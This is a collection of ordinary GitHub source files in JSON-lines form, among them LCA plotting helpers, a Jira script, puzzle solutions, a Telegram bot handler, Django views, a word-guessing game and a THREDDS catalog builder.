+{"seq_id":"42218079054","text":"import brightway2 as bw\nimport numpy as np\nimport pandas as pd\nimport itertools\n\nimport bokeh.io\nimport bokeh.plotting\nimport bokeh.models.tools\nimport bokeh.layouts\nimport bokeh.models\nfrom bokeh.palettes import Category10_10 as palette\nfrom bokeh.transform import dodge\n\n\n\n# bokeh constants\nwidth = 900\nheight = 300\n\n\ndef getILCDMethods():\n aoMethods = [m for m in bw.methods if \"ILCD\" in str(m) and \"2018\" in str(m) and \"LT\" not in str(m)]\n return aoMethods\n\ndef doLCA(oActivity, aoMethods, HHV=None):\n if HHV:\n functional_unit = {oActivity:1/HHV}\n else:\n functional_unit = {oActivity:1}\n oLCA = bw.LCA(functional_unit, aoMethods[0])\n oLCA.lci()\n oLCA.lcia()\n dScores = {aoMethods[0]:oLCA.score}\n for oMethod in aoMethods[1:]:\n oLCA.switch_method(oMethod)\n oLCA.lcia()\n dScores[oMethod] = oLCA.score\n return dScores, oLCA\n\n\ndef compareStaticLCA_interactive(dScores1, dScores2, sFileName=\"static_LCA_comparison.html\", legend1=None, legend2=None):\n\n # check if same methods have been used, abort if not\n if not dScores1.keys() == dScores2.keys():\n print(\"Methods are different. Comparison invalid.\")\n return\n\n # plot layout options\n bar_width = 0.5\n\n # extract method names, units\n ltMethods = [m for m in dScores1.keys()]\n lsUnits = [bw.Method(m).metadata[\"unit\"] for m in dScores1.keys()]\n lsNames = [\", \".join(bw.Method(m).name) for m in dScores1.keys()]\n lsMethodLabels = lsNames\n\n # normalized values\n normalized_v1 = np.array([np.sign(v) for v in dScores1.values()])\n normalized_v2 = np.array([np.sign(v2)*np.abs(v2/v1) for v1, v2 in zip(dScores1.values(), dScores2.values())])\n\n # bar labels = actual values\n lsBarLabels1 = [\"%.2e \" % v + unit for v, unit in zip(dScores1.values(), lsUnits)]\n lsBarLabels2 = [\"%.2e \" % v + unit for v, unit in zip(dScores2.values(), lsUnits)]\n\n # putting it all together\n source1 = bokeh.models.ColumnDataSource(\n data=dict(\n y=normalized_v1,\n method=lsMethodLabels,\n value=lsBarLabels1,\n methods = ltMethods\n )\n )\n source2 = bokeh.models.ColumnDataSource(\n data=dict(\n y=normalized_v2,\n method=lsMethodLabels,\n value=lsBarLabels2,\n methods = ltMethods\n )\n )\n\n TOOLTIPS = [\n (\"method\", \"@method\"),\n (\"value\", \"@value\")\n ]\n\n # plot\n f = bokeh.plotting.figure(x_axis_label=\"indicator\", y_axis_label='normalized impact [-]',\n plot_width=width, plot_height=height*3, tooltips = TOOLTIPS,\n x_range=bokeh.models.FactorRange(*ltMethods))\n p1 = f.vbar(x=\"methods\", top=\"y\", width=bar_width, color=palette[0], alpha=0.6, source=source1)\n p2 = f.vbar(x=dodge('methods', bar_width/2, range=f.x_range), top=\"y\", width=bar_width, color=palette[1], alpha=0.6, source=source2)\n\n # build legend\n legend = bokeh.models.Legend(items=[\n (legend1, [p1]),\n (legend2, [p2]),\n ], location=\"center\", orientation=\"horizontal\", label_width=75)\n f.add_layout(legend, 'above')\n\n # font sizes\n font_size = \"15pt\"\n f.xaxis.axis_label_text_font_size = \\\n f.yaxis.axis_label_text_font_size = \\\n f.xaxis.major_label_text_font_size = \\\n f.yaxis.major_label_text_font_size = \\\n f.legend.label_text_font_size = font_size\n\n # x label rotation\n f.xaxis.major_label_orientation = np.pi / 2\n\n # add tool for strict y-axis zoom\n f.add_tools(bokeh.models.WheelZoomTool(dimensions=\"height\"))\n\n # show the results\n bokeh.io.output_notebook()\n bokeh.io.show(f)\n pass\n\n\ndef plotContributionAnalysis(dContributions, sFileName, lsFromActivities=None, 
sDatabase=None, bLegend=True, fCutOff=0.005):\n\n oParentActivity = list(dContributions.values())[0][0][\"from\"][0]\n\n # find contributions, save in list\n ldMethodActContrib = []\n for oMethod, ldContributions in dContributions.items():\n\n # break down contributions to\n # a) direct contributions to parent activity if no names supplied\n # b) contributions from activities originating in databases which are not sDatabase\n # c) contributions of activities supplied by user, if names are given\n if lsFromActivities:\n direct_contributions = [c for c in ldContributions if c[\"from\"][-1][\"name\"] in lsFromActivities]\n elif sDatabase:\n direct_contributions = [\n c for c in ldContributions if (\n c[\"from\"][-1].get(\"database\",\"\") != sDatabase and\n c[\"to\"][-1].get(\"database\",\"\") == sDatabase and\n not bool(c[\"to\"][-1].get(\"aggregate\",False))\n ) or (\n bool(c[\"from\"][-1].get(\"aggregate\", False))\n )\n ]\n else:\n direct_contributions = [c for c in ldContributions if c[\"to\"] == [oParentActivity]]\n\n\n # save method name, activity name, relative contribution to impact in dictionary\n fuGetName = lambda x: \\\n (x[\"from\"][-1][\"database\"] == \"biosphere3\") * x[\"to\"][-1][\"name\"] +\\\n (x[\"from\"][-1][\"database\"] != \"biosphere3\") * x[\"from\"][-1][\"name\"]\n ld = [{\n \"method\":oMethod,\n \"activity\":fuGetName(a).replace(\"{\",\"(\").replace(\"}\",\")\").replace(\"|\",\", \"), # replace {} from simapro activities to prevent errors\n \"contribution\": np.sign(a[\"global impact\"]) * abs(a[\"global impact\"] / ldContributions[0][\"global impact\"])\n } for a in direct_contributions]\n\n ldMethodActContrib += ld\n\n # make dataframe from list of dict\n dfContributions = pd.DataFrame(ldMethodActContrib)\n dfContributions = dfContributions.groupby(['method', 'activity']).sum().reset_index()\n\n # remove entries smaller than cutoff\n dfContributions = dfContributions[dfContributions[\"contribution\"].abs() >= fCutOff*abs(dfContributions[\"contribution\"].max())]\n\n # pivot, replace 0 with nan\n dfPivoted = dfContributions.pivot(index=\"method\", columns=\"activity\", values=\"contribution\")\n dfPivoted.fillna(0, inplace=True)\n\n # creating necessary dicts and lists for bokeh plot\n data_pos = {c : dfPivoted[c].values * (dfPivoted[c].values > 0) for c in dfPivoted.columns}\n data_neg = {c : dfPivoted[c].values * (dfPivoted[c].values < 0) for c in dfPivoted.columns}\n methods = dfContributions[\"method\"].unique()\n activities = dfPivoted.columns\n colors = [c for a, c in zip(activities, itertools.cycle(palette))]\n data_neg[\"methods\"] = data_pos[\"methods\"] = methods\n source1 = bokeh.models.ColumnDataSource(data=data_pos)\n source2 = bokeh.models.ColumnDataSource(data=data_neg)\n TOOLTIPS = [\n (\"method\", \"@methods\"),\n (\"activity\", \"$name\"),\n (\"contribution\", \"@$name\")\n ]\n\n # plot contributions per category\n f = bokeh.plotting.figure(x_axis_label=\"indicator\", y_axis_label='contribution to impact [-]',\n plot_width=width, plot_height=height*3, tooltips = TOOLTIPS,\n x_range=bokeh.models.FactorRange(*methods))\n p1 = f.vbar_stack(activities, x=\"methods\", width=0.5, alpha=0.6, fill_color=colors, line_color=\"white\", source=source1)\n f.vbar_stack(activities, x=\"methods\", width=0.5, alpha=0.6, fill_color=colors, line_color=\"white\", source=source2)\n\n # x label rotation\n f.xaxis.major_label_orientation = np.pi / 2\n\n # build legend\n if bLegend:\n legend = bokeh.models.Legend(items=[(l,[p]) for l,p in zip(activities,p1)], 
location=\"center\")\n f.add_layout(legend, 'above')\n\n # font sizes\n font_size = \"15pt\"\n f.xaxis.axis_label_text_font_size = \\\n f.yaxis.axis_label_text_font_size = \\\n f.xaxis.major_label_text_font_size = \\\n f.yaxis.major_label_text_font_size = \\\n f.legend.label_text_font_size = font_size\n\n # add tool for strict y-axis zoom\n f.add_tools(bokeh.models.WheelZoomTool(dimensions=\"height\"))\n\n # show the results\n bokeh.io.output_notebook()\n bokeh.io.show(f)\n\n pass\n","repo_name":"BenPortner/indirect_land_use_change_PV_corn","sub_path":"helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":8134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"38509437922","text":"import csv\nfrom jira import client\nimport logging\n\n\nLG = logging.getLogger(__name__)\n\nTASK_TEMPLATE = \"\"\"h2. Requirements\n\nA description of the requirements for this item: This could include all or any of:\n* use cases\n* functional requirements\n* non-functional requirements\n* describe missing tests\n\nh2. Completion Criteria\n\nThis should list, preferably in bullet form, all of the criteria for completion of this task. Once these items have been met, the task is complete.\n\"\"\"\n\n\nclass ReleaseIssues:\n \"\"\"Reads issues from CSV\"\"\"\n\n def __init__(self, input_file):\n self._current = 0\n self._header = None\n self._tasks = None\n with open(input_file, 'rb') as csvfile:\n test_reader = csv.reader(csvfile)\n for row in test_reader:\n if self._header is None:\n self._header = [x.lower() for x in row]\n self._tasks = []\n continue\n\n record = dict(zip(self._header, row))\n self._tasks.append(record)\n\n @property\n def tasks(self):\n return self._tasks\n\n\n\n\ndef run(parsed_args):\n \"\"\"Execute release task creation\n\n parsed_args: command line arguemnts\"\"\"\n\n assert parsed_args.server\n assert parsed_args.user\n assert parsed_args.password\n assert parsed_args.ticket_file\n assert parsed_args.epic\n\n jira = None\n if not parsed_args.dry_run:\n jira = client.JIRA(server=parsed_args.server,\n basic_auth=(parsed_args.user, parsed_args.password))\n\n r = ReleaseIssues(parsed_args.ticket_file)\n for t in r.tasks:\n try:\n description = TASK_TEMPLATE\n issue_dict = {\n 'project': t.get('project'),\n 'summary': t.get('summary'),\n 'description': description,\n 'issuetype': {'name': 'Task'},\n # 'fixVersion': t.get('fixVersion'),\n # 'priority': t.get('priority'),\n }\n LG.error(issue_dict)\n if jira is not None:\n new_issue = jira.create_issue(fields=issue_dict)\n jira.add_issues_to_epic(parsed_args.epic, [new_issue.key])\n print('%s,%s' % (new_issue.key, new_issue.summary))\n except Exception as e:\n print('Unable to add issue: %s' % e)\n print('Unable to issue: %s' % t)\n","repo_name":"delapsley/relman","sub_path":"relman/cmd/release.py","file_name":"release.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"32707350020","text":"#!/usr/bin/env python3\nimport copy\nimport functools\nimport json\nimport itertools\nimport utils\nimport math\nfrom dataclasses import dataclass\nfrom typing import Tuple, List\n\n\n@dataclass\nclass NodePointer:\n value: object\n index: int\n level: int\n _position: Tuple[List, int]\n\n @property\n def is_primitive(self):\n return type(self.value) == int\n\n @property\n def is_regular(self):\n return type(self.value) == list and all(type(v) == int for v in self.value)\n\n def replace(self, new_value):\n lst, idx = self._position\n lst[idx] = new_value\n\n\ndef pointers(value, level=0, counter=None):\n counter = counter or itertools.count()\n for i, elem in enumerate(value):\n yield NodePointer(elem, next(counter), level + 1, (value, i))\n if type(elem) != int:\n yield from pointers(elem, level + 1, counter)\n\n\ndef try_explode(value):\n left_ptr = None\n exploded_ptr = None\n right_ptr = None\n\n for ptr in pointers(value):\n if exploded_ptr is None:\n if ptr.is_primitive:\n left_ptr = ptr\n elif ptr.level == 4 and ptr.is_regular:\n exploded_ptr = ptr\n elif ptr.index > exploded_ptr.index + 2 and ptr.is_primitive:\n right_ptr = ptr\n break\n\n if exploded_ptr:\n a, b = exploded_ptr.value\n if left_ptr:\n left_ptr.replace(left_ptr.value + a)\n if right_ptr:\n right_ptr.replace(right_ptr.value + b)\n exploded_ptr.replace(0)\n return True\n return False\n\n\ndef try_split(value):\n for ptr in pointers(value):\n if ptr.is_primitive and ptr.value >= 10:\n value = ptr.value\n ptr.replace([int(math.floor(value / 2)), int(math.ceil(value / 2))])\n return True\n return False\n\n\ndef sf_reduce(value):\n while True:\n if try_explode(value):\n continue\n if try_split(value):\n continue\n return\n\n\ndef sf_add(a, b):\n result = [copy.deepcopy(a), copy.deepcopy(b)]\n sf_reduce(result)\n return result\n\n\ndef magnitude(elem):\n if type(elem) == int:\n return elem\n else:\n a, b = elem\n return 3 * magnitude(a) + 2 * magnitude(b)\n\n\ndef main():\n numbers = [json.loads(line.strip()) for line in utils.input()]\n result = functools.reduce(sf_add, numbers)\n print(result)\n print(magnitude(result))\n magnitudes = (magnitude(sf_add(a, b)) for a, b in itertools.permutations(numbers, 2))\n print(max(magnitudes))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"technocoreai/aoc2021","sub_path":"aoc18.py","file_name":"aoc18.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17942440186","text":"# с помощью данной функции, мы находим периметр всех имеющихся островов на карте.\n# сложность: O(m * n).\n\nclass Solution:\n def islandPerimeter(self, grid: List[List[int]]) -> int:\n\n # задаем переменную для результата\n perimeter = 0\n\n # создаем переменные для колонок и рядов\n height, weight = len(grid), len(grid[0])\n\n # циклами проходим по всем элементам на карте\n for row in range(height):\n for column in range(weight):\n\n # присваиваем каждому острову периметр 4\n if grid[row][column]:\n perimeter += 4\n\n # если над островом есть еще остров, то вычитаем 2\n if row and grid[row-1][column]:\n perimeter -= 2\n\n # если слева острова есть еще остров, то вычитаем 2\n if column and grid[row][column-1]:\n perimeter -= 2\n\n return perimeter\n","repo_name":"blinmakersha/HW_algorithm_1_semestr","sub_path":"HW_3/fifth_task.py","file_name":"fifth_task.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"28798301033","text":"from telegram import Update, ReplyKeyboardMarkup\nfrom telegram.ext import ContextTypes, CommandHandler, MessageHandler, filters, ConversationHandler\nimport word as w\nfrom home_markup import markup, goHome\n\n# /add 관련 state 설정\nSEARCH_ITEM, APPLY_ITEM = range(2)\n\nasync def add_command(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await update.message.reply_text(\"가격변동 알리미 🔔\\n검색어를 상세하게 입력해주세요 🔍\\n최대 15개의 상품이 조회됩니다.\")\n return SEARCH_ITEM\n\n\n# 아이템 검색\nasync def search_list(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await update.message.reply_text(\"상품을 검색중입니다. 잠시만 기다려주세요 🔍\")\n # 검색이 됐다고 가정을 하는 리스트\n data_list = [\n [\"등록완료\"],\n [\"아이패드 프로 12.9 5세대 M1^_^v_\"],\n [\"아이패드 프로 11인치 3세대 M1^_^v_\"],\n [\"아이패드 거치대^_^v_\"],\n [\"아이패드 미니 6세대 64Gb 와이파이^_^v_\"],\n [\"에러발생용 미니 6세대 64Gb 와이파이\"]\n ]\n reply_list = ReplyKeyboardMarkup(data_list, one_time_keyboard=False)\n await update.message.reply_text(\"알림 받기 원하는 상품을 클릭해주세요 🔔\\n여러개 선택이 가능하며, 모두 선택 후 완료 버튼을 눌러주세요 😊\", reply_markup=reply_list)\n return APPLY_ITEM\n\n\n# 아이템 등록\nasync def add_item(update: Update, context: ContextTypes.DEFAULT_TYPE):\n message = update.message.text\n\n if(w.PARSER in message):\n try:\n await update.message.reply_text(\"선택상품 등록 완료 :: {}\".format(message))\n except:\n await update.message.reply_text(\"등록중 오류가 발생했습니다 🚫\\n🔽 키보드 왼쪽 메뉴를 이용해주세요\", reply_markup=markup)\n return ConversationHandler.END\n else:\n await goHome(update=update)\n return ConversationHandler.END\n\n\nasync def done_add_item(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await goHome(update=update)\n return ConversationHandler.END\n\n\nasync def error_task(update: Update, context: ContextTypes.DEFAULT_TYPE):\n await goHome(update=update)\n return ConversationHandler.END\n\n\n# 핸들러 설정\nconv_handler = ConversationHandler(\n entry_points=[CommandHandler(\"add\", add_command)],\n states={\n # 아이템 검색\n SEARCH_ITEM: [\n MessageHandler(filters.TEXT, search_list)\n ],\n # 아이템 등록\n APPLY_ITEM: [\n # 1. 등록완료\n MessageHandler(filters.Regex(\"^({})$\".format(w.ADD_DONE)), done_add_item ),\n # 2. 계속등록\n MessageHandler(filters.TEXT & ~(filters.COMMAND), add_item)\n ]\n },\n fallbacks=[MessageHandler(filters.TEXT, error_task)],\n )","repo_name":"flxh4894/python_study","sub_path":"handler/custom_add_handler.py","file_name":"custom_add_handler.py","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2796965640","text":"# Write a function named unique_common that accepts two lists both of which contain integers as parameters and returns a sorted list (ascending order) which contains unique common elements from both the lists. If there are no common elements between the two lists, then your function should return the keyword None\n#\n# For example, if two of the lists received by the function are:\n#\n# ([5, 6, -7, 8, 8, 9, 9, 10], [2, 4, 8, 8, 5, -7])\n#\n# You can see that elements 5, -7, and 8 are common in both the first list and the second list and that the element 8 occurs twice in both lists. Now you should return a sorted list (ascending order) of unique common elements like this:\n#\n# [-7, 5, 8]\n#\n# if the two lists received by the function are:\n#\n# ([5, 6, 7, 0], [3, 2, 3, 2])\n#\n# Since, there are no common elements between the two lists, your function should return the keyword\n#\n#None\n#\n# compara los elementos entre a y b\ndef unique_common(a, b):\n lista_extendida=[]\n for x in a:\n if x in b:\n lista_extendida.append(x)\n evalua_funcion_lista_depurada = funcion_lista_depurada(lista_extendida)\n if evalua_funcion_lista_depurada!=[]:\n return evalua_funcion_lista_depurada\n\n# Funcion recibe lista completa y elimina numeros repetidos\ndef funcion_lista_depurada(lista_extendida):\n lista_final = []\n for i in lista_extendida:\n if i not in lista_final:\n lista_final.append(i)\n lista_final.sort()\n registros = int(len(lista_final)) \n #return lista_final, registros\n return lista_final\n \n# OJO SOLO LA FUNCION!!!\n# Main Program #\na = [1,2,3,4,5,6,5,7,8,9,-1]\nb = [4,9,10,12,-1,5,13,1]\nevalua_unique_common = unique_common(a, b) \nprint(evalua_unique_common)\n","repo_name":"ivanromanv/manuales","sub_path":"Python/Edx_Course/Introduction to Programming Using Python/Excercises/W5_Midterm Exam_elementos_comunes_unicos.py","file_name":"W5_Midterm Exam_elementos_comunes_unicos.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"25855823010","text":"from django.http import JsonResponse\nimport json\n\n# 导入 city \nfrom common.models import Citylog\n\ndef dispatcher(request):\n # 将请求参数统一放入request 的 params 属性中,方便后续处理\n\n # GET请求 参数在url中,同过request 对象的 GET属性获取\n if request.method == 'GET':\n request.params = request.GET\n\n # POST/PUT/DELETE 请求 参数 从 request 对象的 body 属性中获取\n elif request.method in ['POST','PUT','DELETE']:\n # 根据接口,POST/PUT/DELETE 请求的消息体都是 json格式\n request.params = json.loads(request.body)\n\n\n # 根据不同的action分派给不同的函数进行处理\n action = request.params['action']\n if action == 'list_city':\n return listcities(request)\n elif action == 'add_city':\n return addcity(request)\n elif action == 'modify_city':\n return modifycity(request)\n elif action == 'del_city':\n return deletecity(request)\n\n else:\n return JsonResponse({'ret': 1, 'msg': '不支持该类型http请求'})\n\ndef listcities(request):\n # 返回一个 QuerySet 对象 ,包含所有的表记录\n qs = Citylog.objects.values()\n\n # 将 QuerySet 对象 转化为 list 类型\n # 否则不能 被 转化为 JSON 字符串\n retlist = list(qs)\n\n return JsonResponse({'ret': 0, 'retlist': retlist})\n\ndef addcity(request):\n\n info = request.params['data']\n\n # 从请求消息中 获取要添加客户的信息\n # 并且插入到数据库中\n # 返回值 就是对应插入记录的对象 \n record = Citylog.objects.create(key=info['key'] ,\n time=info['time'])\n\n return JsonResponse({'ret': 0, 'id':record.id})\n\n\ndef modifycity(request):\n\n # 从请求消息中 获取修改客户的信息\n # 找到该客户,并且进行修改操作\n \n cityid = request.params['id']\n newdata = request.params['newdata']\n\n try:\n # 根据 id 从数据库中找到相应的客户记录\n city = Citylog.objects.get(id=cityid)\n except Citylog.DoesNotExist:\n return {\n 'ret': 1,\n 'msg': f'id 为`{cityid}`的城市不存在'\n }\n\n\n if 'key' in newdata:\n city.key = newdata['key']\n if 'time' in newdata:\n city.time = newdata['time']\n\n # 注意,一定要执行save才能将修改信息保存到数据库\n city.save()\n\n return JsonResponse({'ret': 0})\n\ndef deletecity(request):\n\n cityname = request.params['key']\n\n try:\n # 根据 key 从数据库中找到相应的城市记录\n cityinfo = Citylog.objects.get(key=cityname)\n except Citylog.DoesNotExist:\n return {\n 'ret': 1,\n 'msg': f'key 为`{cityname}`的城市不存在'\n }\n\n # delete 方法就将该记录从数据库中删除了\n cityinfo.delete()\n\n return JsonResponse({'ret': 0})","repo_name":"sssjmmm/Microservice-Architecture","sub_path":"backend-projects/bysms/mgr/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17485594882","text":"\"\"\"KVRX URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom . import views\n\nurlpatterns = [\n #Index\n url(r'^$', views.index, name=\"pages_index\"),\n #Hardcoded pages\n url(r'^base', views.base, name=\"pages_base\"), #REMOVE IN PRODUCTION\n url(r'^shows', views.shows, name=\"pages_shows_index\"),\n url(r'^login', views.login, name=\"pages_login\"),\n #Keyword pages\n url(r'^dj/(?P.+)/$', views.dj_detail, name=\"pages_dj_detail\"),\n url(r'^show/(?P.+)/$', views.show_detail, name=\"pages_show_detail\"),\n #User created pages (CMS)\n url(r'^(?P
.+)/$', views.custom_page, name=\"pages_custom_page\"),\n]\n\nadmin.site.site_header = 'KVRX Admin'\nadmin.site.site_title = 'KVRX Admin'","repo_name":"mattjegan/KVRX-Website","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"41133462986","text":"\r\n\r\n# Use a dictionary\r\n#\r\nimport random\r\n\r\npoints = 0\r\ntries = 0\r\n\r\nwords = {\r\n \"Love\" :[\"A word for affection.\", \"A feeling of compassion.\", \"A feeling of great interest in something.\", \"A romantic feeling.\"],\r\n \"Endgame\" :[\"The highest grossing movie of all time.\", \"The last movie of one the most watched movie series.\", \"Pepperony's last movie together.\", \"'If I tell you, it wont happen.'\"],\r\n \"Sia\" :[\"He/she is the inspiration of the movie 'Music'.\", \"He/She sang 'Move you body'.\", \"He/She sang 'Elastic heart'.\", \"In his or her song, 'I don't need money.'\"],\r\n \"Church\" :[\"The body of Christ.\", \"A gathering of people who come to worship God.\", \"A place of worship.\", \"The house of God.\"],\r\n \"Gay\" :[\"To be extremely happy.\", \"To be attracted to the same sex.\", \"To be in a romantic relationship with the same sex.\", \"It has the letter 'y'.\"],\r\n \"Game\" :[\"To be ready for something.\", \"To be prepared for something\", \"A state of readiness.\", \"To be prepared.\"],\r\n \"Queen\" :[\"The name of a former popular boy-band.\", \"The female head of a monarchy.\", \"Has double letter 'e'.\", \"The wife of a king.\"]\r\n}\r\n\r\nscores = {} \r\n\r\nkeys = []\r\nfor k in words.keys():\r\n keys.append(k)\r\n\r\nuser_valid_plays = []\r\n\r\nword = \"\"\r\nhint = \"\"\r\n\r\ndef set_word():\r\n global words, word, hint, keys, user_valid_plays\r\n word = random.choice(keys)\r\n hint = random.choice(words[word])\r\n user_valid_plays = []\r\n x = 0\r\n\r\ndef settings():\r\n global tries\r\n do = input(\"What level of this game do you wish to play:\\n 1. Easy Level\\n 2. Medium Level\\n 3. Hard Level\\n : \")\r\n if do == \"1\":\r\n tries = 5\r\n elif do == \"2\":\r\n tries = 3\r\n elif do == \"3\":\r\n tries = 1\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n settings()\r\n game()\r\n\r\ndef is_complete():\r\n global user_valid_plays, word\r\n for w in word:\r\n if w.lower() not in user_valid_plays:\r\n return False\r\n return True\r\n \r\ndef print_dashes():\r\n global word, user_valid_plays\r\n for i in word:\r\n if i.lower() in user_valid_plays:\r\n print(i,end=\" \")\r\n else:\r\n print(\"_\",end=\" \")\r\n print(\"\")\r\n\r\ndef game(): \r\n global x, points, tries\r\n name = input(\"Input your player name: \")\r\n try:\r\n scores[name]\r\n except:\r\n scores[name] = 0\r\n \r\n attempts = tries\r\n set_word()\r\n print_dashes()\r\n print(\"Hint:\",hint)\r\n while attempts > 0:\r\n if not is_complete():\r\n guess = input(\"Guess a letter in this word: \").strip().lower()\r\n if len(guess) > 1:\r\n attempts = attempts - 1\r\n print(\"Input one letter at a time... You have\",attempts,\"tries left\")\r\n elif guess in word.lower():\r\n user_valid_plays.append(guess)\r\n print(\"This letter is in the word\") \r\n else:\r\n attempts = attempts - 1\r\n print(\"The letter is not a in the word... 
You have\",attempts,\"tries left\")\r\n if attempts == 0:\r\n print(\"The word is:\",word)\r\n again()\r\n print_dashes()\r\n points = attempts\r\n else:\r\n print(\"CONGRATULATIONS!!!\")\r\n scores[name] += points\r\n again()\r\n \r\n\r\ndef leaderboard():\r\n global points, scores, name\r\n print(\">>>>>LEADERBOARD<<<<<\")\r\n print(\"PLAYER NAME\\t|\\tSCORE\")\r\n \r\n sx = list(scores.values())\r\n \r\n sy = []\r\n for s in sx:\r\n if s not in sy:\r\n sy.append(s)\r\n \r\n sy.sort(reverse=True)\r\n\r\n for y in sy:\r\n for s in scores.items():\r\n if s[1] == y:\r\n print(f\"{s[0]} \\t\\t | \\t {s[1]}\")\r\n #print(scores.items())\r\n \r\ndef again():\r\n global tries, x\r\n again = input(\"Do you wish to:\\n 1. Play again.\\n 2. Go to main menu.\\n 3. Quit\\n : \")\r\n if again == \"1\":\r\n game()\r\n elif again == \"2\":\r\n opt()\r\n elif again == \"3\":\r\n quit()\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n opt()\r\n\r\ndef addList():\r\n word = input(\"Input the word to be added: \")\r\n hint = input(\"Input the hint to be added: \")\r\n words.update({word: hint})\r\n input(\"Press Enter\")\r\n print(f\"Word: {word} \\t|\\t Hint: {hint}\\n\")\r\n opt()\r\n\r\ndef opt():\r\n global tries, x\r\n do = input(\"Do you wish to:\\n 1. Play a new game.\\n 2. Go to settings.\\n 3. Check leaderboard\\n 4. Add a word\\n : \")\r\n if do == \"1\":\r\n print(\"NOTE: This game will automaticlly start from the easy level.\\nHowever you can change this in settings.\")\r\n input(\"Press Enter\")\r\n tries = 5\r\n game()\r\n elif do == \"2\":\r\n settings()\r\n elif do == \"3\":\r\n leaderboard()\r\n elif do == \"4\":\r\n addList()\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n opt()\r\n \r\n#def name():\r\n #name = input(\"Input your player name: \")\r\n \r\ntry:\r\n print(\">>>>>Guess the Word<<<<<\")\r\n opt()\r\nexcept:\r\n print(\"Code Error... Restart this program\")\r\n input(\"Press Enter\")\r\n opt()\r\n \r\n","repo_name":"mistlebeehyper/Python-Codes","sub_path":"Game 2.py","file_name":"Game 2.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"10681054272","text":"# encoding: utf-8\n\"\"\"\n\n\"\"\"\n__author__ = 'Richard Smith'\n__date__ = '25 Feb 2020'\n__copyright__ = 'Copyright 2018 United Kingdom Research and Innovation'\n__license__ = 'BSD - see LICENSE file in top-level package directory'\n__contact__ = 'richard.d.smith@stfc.ac.uk'\n\nfrom tds_utils.create_catalog import CatalogBuilder, AccessMethod, DatasetRoot, AvailableServices, Aggregation, get_catalog_name, CatalogRef\nfrom collections import namedtuple\nimport os\nfrom jinja2 import Environment, PackageLoader\n\n\n# Not used?\nProperty = namedtuple('Property', ('name', 'value'))\nVariable = namedtuple('Variable', ['name', 'vocabulary_name', 'units'])\n\n\nclass Dataset:\n \"\"\"\n Not used?\n \"\"\"\n\n def __init__(self, id, name=None, urlpath=None, properties=[], access_methods=[], size=None):\n self.name = name if name else id\n self.id = id\n self.urlpath = urlpath\n self.properties = properties\n self.access_methods = access_methods\n self.dataSize = size\n\n\nclass CCICatalogBuilder(CatalogBuilder):\n DS_ROOT = 'esg_esacci'\n\n def __init__(self):\n super().__init__()\n self.env = Environment(loader=PackageLoader(\"cci_publisher\", \"templates\"))\n self.env.trim_blocks = True\n self.env.lstrip_blocks = True\n\n def create_dataset(self, result, file_services):\n \"\"\"\n Not used?\n\n :param result:\n :param file_services:\n :return:\n \"\"\"\n this_id = result['name']\n\n # Going from [1:] to remove the first slash\n url_path = os.path.join(self.DS_ROOT, result['directory'][1:], this_id)\n a_meths = [AccessMethod(s, url_path, \"NetCDF-4\") for s in file_services]\n\n size = result['size']\n\n dataset = Dataset(id=this_id, access_methods=a_meths, size=size)\n\n return dataset\n\n def dataset_catalog(self, ds_id, opendap=False):\n \"\"\"\n Build a THREDDS catalog and return the XML as a string\n\n :param ds_id: DRS ID\n :type ds_id: str\n\n :param opendap: Whether or not the service is available via opendap\n :type opendap: bool\n\n :return: XML string\n :rtype: string\n \"\"\"\n # Work out which services are required\n file_services = {AvailableServices.HTTP.value}\n aggregation = None\n\n if opendap:\n file_services.add(AvailableServices.OPENDAP.value)\n\n all_services = file_services.copy()\n\n context = {\n \"services\": all_services,\n \"dataset_id\": ds_id,\n \"aggregation\": aggregation,\n }\n\n return self.render(\"dataset_catalog.xml\", **context)\n\n def root_catalog(self, cat_paths, root_dir, name=\"THREDDS catalog\"):\n \"\"\"\n 